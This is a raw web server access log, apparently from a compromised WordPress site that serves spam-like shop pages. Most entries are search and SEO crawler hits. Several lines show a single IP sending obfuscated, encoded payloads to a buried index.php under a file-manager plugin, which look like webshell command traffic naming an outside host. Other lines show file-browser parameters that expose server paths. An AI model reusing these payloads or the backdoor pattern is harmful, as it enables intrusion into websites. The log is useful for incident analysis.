66.249.73.162 - - [26/Apr/2026:11:12:44 +0300] "GET /015000206.htm HTTP/1.1" 200 28542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.244.242.133 - - [26/Apr/2026:11:13:06 +0300] "GET /shop/dacrydium/golden062839577482.html HTTP/2" 200 8017 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.216.113.70 - - [26/Apr/2026:11:11:06 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343636362p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139313036362q3431356230616362346638383266303133353534306332633434653634623531222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:11:13:07 +0300] "GET /?detail/342123291 HTTP/1.1" 200 30231 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:11:13:09 +0300] "GET /shop/impuration/idolizer763911601930.html HTTP/1.1" 200 29105 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.162 - - [26/Apr/2026:11:13:21 +0300] "GET /?detail/497774574 HTTP/1.1" 200 30518 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [26/Apr/2026:11:13:23 +0300] "GET /robots.txt HTTP/2" 200 102 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:13:23 +0300] "GET /'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Felementor%2Fmodules%2Fshapes%2Fmodule.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Felementor%2Fmodules%2Fshapes HTTP/2" 200 3442 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [26/Apr/2026:11:13:22 +0300] "GET /?prizes/54224131 HTTP/1.1" 200 31137 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [26/Apr/2026:11:13:24 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fessential-grid%2Fpublic%2Fassets%2Fcss%2Findex.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fessential-grid%2Fpublic%2Fassets%2Fcss HTTP/2" 200 2902 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:13:24 +0300] "GET /'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fessential-grid%2Fadmin%2Fviews%2Fheader.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fessential-grid%2Fadmin%2Fviews HTTP/2" 200 3124 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:13:25 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Felementor%2Fdata%2Fv2%2Fbase%2Fprocessor.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Felementor%2Fdata%2Fv2%2Fbase HTTP/2" 200 3315 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:13:27 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2FRequests%2FException%2FHTTP%2F403.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2FRequests%2FException%2FHTTP HTTP/2" 200 3029 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:13:27 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Ffileorganizer%2Fmanager%2Fphp%2Flibs%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Ffileorganizer%2Fmanager%2Fphp%2Flibs HTTP/2" 200 2977 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:13:28 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fcss%2Fcolors%2Fblue%2Fblue%2Fblue%2Fcache.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-admin%2Fcss%2Fcolors%2Fblue%2Fblue%2Fblue HTTP/2" 200 3122 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [26/Apr/2026:11:11:28 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343638382p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139313038382q6131646666636130376431386265346561323136316535346630386434643538222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:11:13:36 +0300] "GET /?detail/160394159 HTTP/1.1" 200 28347 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.195.183.23 - - [26/Apr/2026:11:13:38 +0300] "GET /detail/342327095 HTTP/2" 200 8037 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [26/Apr/2026:11:13:38 +0300] "GET /?prizes/88400404 HTTP/1.1" 200 28639 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:11:11:49 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343730392p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139313130392q3336633664663863343862376435643535393534623735313030306539333665222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:11:13:58 +0300] "GET /?detail/519852682 HTTP/1.1" 200 30502 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:13:59 +0300] "GET /shop/overpester/cordelier33424267919.html HTTP/1.1" 200 30227 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:03 +0300] "GET /shop/townless/urostyle60300739188.html HTTP/1.1" 200 29092 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; GoogleOther)"
198.244.240.238 - - [26/Apr/2026:11:14:04 +0300] "GET /shop/vultern/nemathelminthes06549764651.html HTTP/2" 200 8010 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [26/Apr/2026:11:14:06 +0300] "GET /?detail/529885025 HTTP/1.1" 200 29881 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:07 +0300] "GET /?detail/402264731 HTTP/1.1" 200 30406 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:09 +0300] "GET /?detail/18889199 HTTP/1.1" 200 29222 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:11:12:10 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343733302p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139313133302q3033653735623862313863393637663530656138616530343564626332613566222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:11:14:20 +0300] "GET /?detail/356187898 HTTP/1.1" 200 28590 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:21 +0300] "GET /shop/escarole/corroding574047626753.html HTTP/1.1" 200 28724 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:25 +0300] "GET /?detail/756539036 HTTP/1.1" 200 29223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:26 +0300] "GET /?detail/356187898 HTTP/1.1" 200 28412 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:27 +0300] "GET /shop/verbigerated/forenoon29569563709.html HTTP/1.1" 200 28646 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:28 +0300] "GET /?prizes/72964484 HTTP/1.1" 200 29030 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:11:12:32 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343735322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139313135322q3439663332623265656263306665343737343964316636626431326231653935222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
66.249.73.162 - - [26/Apr/2026:11:14:31 +0300] "GET /shop/sulphate/batfowler291530424679.html HTTP/1.1" 200 28952 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:32 +0300] "GET /?detail/75893543 HTTP/1.1" 200 29176 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.38.147.144 - - [26/Apr/2026:11:14:34 +0300] "GET /shop/transmutation/dravidian00792481100.html HTTP/2" 200 8031 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.162 - - [26/Apr/2026:11:14:34 +0300] "GET /?prizes/55050111 HTTP/1.1" 200 28398 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:34 +0300] "GET /?detail/370125041 HTTP/1.1" 200 28121 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:36 +0300] "GET /?detail/12369859 HTTP/1.1" 200 29353 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:38 +0300] "GET /?detail/780556377 HTTP/1.1" 200 29486 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:38 +0300] "GET /?detail/878148338 HTTP/1.1" 200 29595 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [26/Apr/2026:11:14:39 +0300] "GET /url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fcomment-content%2Fstyle.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fcomment-content HTTP/2" 200 2894 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:14:39 +0300] "GET /url%20=%3Cwidth%3Ex%3Cheight%3E%20%22optional%20title%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fcomment-content%2Fstyle.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fcomment-content HTTP/2" 200 3575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:14:41 +0300] "GET /kasyno-na-komorke-na-pieniadze/?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fessential-grid%2Fpublic%2Fassets%2Fcss%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fessential-grid%2Fpublic%2Fassets%2Fcss HTTP/2" 200 2981 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:14:41 +0300] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fessential-grid%2Fpublic%2Fassets%2Fcss%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fessential-grid%2Fpublic%2Fassets%2Fcss HTTP/2" 200 2981 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.164 - - [26/Apr/2026:11:14:40 +0300] "GET /?detail/671345930 HTTP/1.1" 200 29672 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:40 +0300] "GET /?detail/992340943 HTTP/1.1" 200 29850 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [26/Apr/2026:11:14:42 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fcontact-form-7%2Fadmin%2Fincludes%2Feditor.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fcontact-form-7%2Fadmin%2Fincludes HTTP/2" 200 5179 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:14:42 +0300] "GET /'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fone-click-demo-import%2Fassets%2Fcss%2Fmain.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fone-click-demo-import%2Fassets%2Fcss HTTP/2" 200 27279 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:14:43 +0300] "GET /'?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Felementor%2Fmodules%2Fshapes%2Fwidgets%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Felementor%2Fmodules%2Fshapes%2Fwidgets HTTP/2" 200 2979 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [26/Apr/2026:11:14:42 +0300] "GET /shop/recognitor/radium303676184619.html HTTP/1.1" 200 28593 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:11:14:43 +0300] "GET /?detail/134256093 HTTP/1.1" 200 30553 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:11:14:46 +0300] "GET /?detail/639075652 HTTP/1.1" 200 28575 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:46 +0300] "GET /?detail/559774317 HTTP/1.1" 200 30075 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:11:14:49 +0300] "GET /?detail/847433659 HTTP/1.1" 200 29892 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:50 +0300] "GET /?detail/851830426 HTTP/1.1" 200 30120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:51 +0300] "GET /?detail/147949814 HTTP/1.1" 200 29290 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:14:52 +0300] "GET /?detail/701195831 HTTP/1.1" 200 29975 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.216.113.70 - - [26/Apr/2026:11:12:54 +0300] "GET /wp-content/plugins/wp-file-manager/lib/codemirror/mode/webidl/webidl/index.php?ARRAY=7o2230223n313737373139343737342p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373139313137342q3732306432333236316433396530313138646330613332633336363238393034222p2232223n226666616432306336363539353766323033666335373337623132623639353734222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33372q35372q36322q37342q38392q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.81 - - [26/Apr/2026:11:15:05 +0300] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Ftheme-rtl.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2926 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:15:05 +0300] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode%2Ftheme-rtl.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fcode HTTP/2" 200 2925 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [26/Apr/2026:11:15:05 +0300] "GET /shop/judger/warrantor301389103518.html HTTP/1.1" 200 30269 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [26/Apr/2026:11:15:06 +0300] "GET /'?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Felementor%2Fapp%2Fmodules%2Fkit-library%2Fdata%2Fkits HTTP/2" 200 3378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:15:06 +0300] "GET /'?path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fplugins%2Fessential-grid%2Fadmin%2Fassets%2Fcss HTTP/2" 200 3527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.226.80 - - [26/Apr/2026:11:15:07 +0300] "GET /shop/squiralty/matter00491915499.html HTTP/2" 200 7997 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.73.164 - - [26/Apr/2026:11:15:07 +0300] "GET /?detail/255911718 HTTP/1.1" 200 29732 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:11:15:07 +0300] "GET /?prizes/116775606 HTTP/1.1" 200 28905 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.81 - - [26/Apr/2026:11:15:09 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fjs%2Ftinymce%2Fthemes%2Finlite%2Ftheme.js&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-includes%2Fjs%2Ftinymce%2Fthemes%2Finlite HTTP/2" 200 71295 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:15:09 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fnavigation-link%2Fstyle.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-includes%2Fblocks%2Fnavigation-link HTTP/2" 200 2939 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.81 - - [26/Apr/2026:11:15:10 +0300] "GET /?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Fplugins%2Fwpforms-lite%2Fwpforms.php&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Fplugins%2Fwpforms-lite HTTP/2" 200 5512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.73.162 - - [26/Apr/2026:11:15:09 +0300] "GET /shop/repiningly/dippels281630684260.html HTTP/1.1" 200 30195 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.162 - - [26/Apr/2026:11:15:11 +0300] "GET /?detail/48844704 HTTP/1.1" 200 30279 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.164 - - [26/Apr/2026:11:15:12 +0300] "GET /?detail/486222045 HTTP/1.1" 200 28772 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
